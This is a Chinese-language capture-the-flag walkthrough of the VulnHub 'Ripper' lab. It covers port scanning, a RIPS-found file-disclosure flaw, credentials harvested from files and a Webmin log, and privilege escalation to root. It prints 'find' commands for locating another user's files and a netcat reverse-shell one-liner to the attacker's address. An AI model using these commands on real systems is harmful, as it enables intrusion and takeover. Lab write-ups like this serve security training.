VnlnHub Ripper
2022-10-16 15:12:30 Author: www.freebuf.com(查看原文) 阅读量:5 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

靶场搭建

靶场下载地址:https://download.vulnhub.com/ripper/Ripper.ova

下载下来是虚拟机.ovf压缩文件,这个靶机是VirtualBox的,直接用VM打开会报错想要用VM打开可以看我这篇文章:https://www.freebuf.com/sectool/343724.html

打开后把网络模式设置为NAT模式(桥接模式也可以,和kali攻击机保持一致就可以)

开启虚拟机

1665894045_634b869d8015d3575c207.png!small?1665894045044

靶场搭建完毕

渗透测试

由于不知道靶机ip,所以需要扫描NAT的网段

1665894058_634b86aa457a27cbcbbfc.png!small?1665894057853

147为kali攻击机的ip,所以148为靶机ip

扫描靶机端口服务开放情况

1665894069_634b86b59378f574e6afc.png!small?1665894069145

开放了22端口,存在SSH服务

开放了80端口存在http服务,且中间件为Apache2.4.29

开放了10000端口,存在http服务,且中间件为MiniServ1.910(Webmin)

先访问一下80端口的WEB

为Apache初始页面

1665894082_634b86c296dfad335852f.png!small?1665894082158

搜索一下敏感目录,使用了不同工具不同字典,但是没有发现其它敏感目录

1665902911_634ba93f0f435a7d40c08.png!small?1665902910684

1665902921_634ba9493f6d37c900e55.png!small?1665902920357

1665902928_634ba950550e304f83881.png!small?1665902927392

所以我们先去看一下10000端口的WEB

1665902940_634ba95c01f1194a1c49b.png!small?1665902938956

让我们访问https://bogon:10000。,所以我们需要把这个域名添加到hosts文件中

1665902954_634ba96aec4ff5f9fb15c.png!small?1665902953907

访问发现是Webmin的后台登录页面

1665902967_634ba977add5886db6051.png!small?1665902966944

先尝试一下是否存在admin/admin/admin123这样的弱口令,发现不存在

1665902981_634ba985035e6c5834dad.png!small?1665902980051

搜索一下敏感目录

发现存在robots.txt,里面有一段base64编码

1665902994_634ba992e97e56a4481fc.png!small?1665902993940

解码

1665903005_634ba99dd7970949c5e25.png!small?1665903004876

提示说他们用rips扫描php代码

通过搜索知道它是一个PHP源代码审计工具RIPS

并且使用rips,可能会存在rips路径

1665903022_634ba9ae7b6097bec98bc.png!small?1665903021543

尝试访问,发现没有

1665903034_634ba9baa2562deb71a7e.png!small?1665903033751

猜测可能是在80端口上,尝试访问,发现果然再80端口上

1665903045_634ba9c58ee478a712132.png!small?1665903045314

这是一个代码审计,找是否存在漏洞的自动化工具,所以我们再WEB的根目录(/var/www)扫描,并且勾选扫描子目录选项,进行扫描

扫描成功,查看结果

1665903060_634ba9d4c6f96a0652025.png!small?1665903060184

查找看是否存在可以利用的漏洞,发现存在文件泄露并且存在file参数

1665903072_634ba9e057f22cc846a7a.png!small?1665903071456

尝试利用,发现可以读网站根路径下的文件,但是不能读取web路径以外的路径

1665903083_634ba9eb6df3206b37379.png!small?1665903082433

发现这个漏洞只能用于读取文件,不会进行解析

1665903094_634ba9f61c01d6ede30da.png!small?1665903093201

所以我们只能尝试去读取一些敏感信息

这个代码审计工具有搜索的功能,尝试看能不能搜索到关于账号密码的信息

1665903108_634baa0401e122c134444.png!small?1665903106973

1665903113_634baa09459d791a6a987.png!small?1665903112531

搜索发现了一组用户名和密码

1665903125_634baa1585d4291feeca7.png!small?1665903124503

ssh服务是开启的,尝试登录,发现登录成功

1665903134_634baa1ecaa1bdd3420f6.png!small?1665903133910

获得到第一个flag

1665903147_634baa2b7ecb6797c5b8b.png!small?1665903146852

还发现一个可疑文件,但是为空,好像是让我们sudo提权为admin

1665903161_634baa3912092f265dd09.png!small?1665903159970

但是发现没有sudo命令

1665903170_634baa4261b2382bede17.png!small?1665903169304

在/home目录下发现还存在一个叫做cubes的用户,我们可能需要先提权到这个用户

1665903182_634baa4e5d761dd2f2399.png!small?1665903181317

使用其它方式提权

需要提权到cubes用户,所以我们现在找cubes权限的文件,并且可以被ripper读的文件

通过命令

find / -user cubes -type f -exec ls -al {} \; 2>/dev/null查看cubes用户权限的文件

1665903194_634baa5a1105f7ada9f8d.png!small?1665903193132

发现secret.file文件,查看文件

1665903204_634baa64a0c734d3092ce.png!small?1665903203619

发现一段密码,猜测是cubes用户的密码,尝试登录,登录成功

1665903217_634baa7185456584087b4.png!small?1665903216880

尝试再次提权到root,sudo提权、suid提权、内核提权都不行

在尝试通过同样的方法在找找有什么其它特殊文件

发现有很多没用的目录和文件,经过过滤得到结果

find / -user cubes -type f -exec  ls -al {}  \; 2>/dev/null |  grep -v '.png' | grep -v '/proc' | grep -v '/sys'

发现一个miniser.log日志文件

1665903243_634baa8bd1c67a5d0c22f.png!small?1665903243038

在其中发现一对账号密码

1665903256_634baa98cbfdbd4784c37.png!small?1665903256717

猜测是登录webmin后台的,因为在webmin目录下

尝试登陆,登录成功

1665903273_634baaa93678bff303a37.png!small?1665903272246

在左下角发现可以直接执行命令

1665904033_634bada1ea76880a936ff.png!small?1665904032907

发现权限为root

1665904046_634badaeb3d007a0e1a0f.png!small?1665904045660

利用这个命令执行再反弹一个shell

先监听端口,然后执行命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f

1665904068_634badc47177bd8434d32.png!small?16659040674211665904071_634badc79c4f8fa4d090a.png!small?1665904070704

获得第二个flag

1665904083_634badd3efef7fcd2f2b2.png!small?1665904082995

此版本的webmin也存在rce漏洞,但是也需要账号密码,登陆后也可以通过漏洞来获得shell。


文章来源: https://www.freebuf.com/articles/web/346957.html
如有侵权请联系:admin#unsafe.sh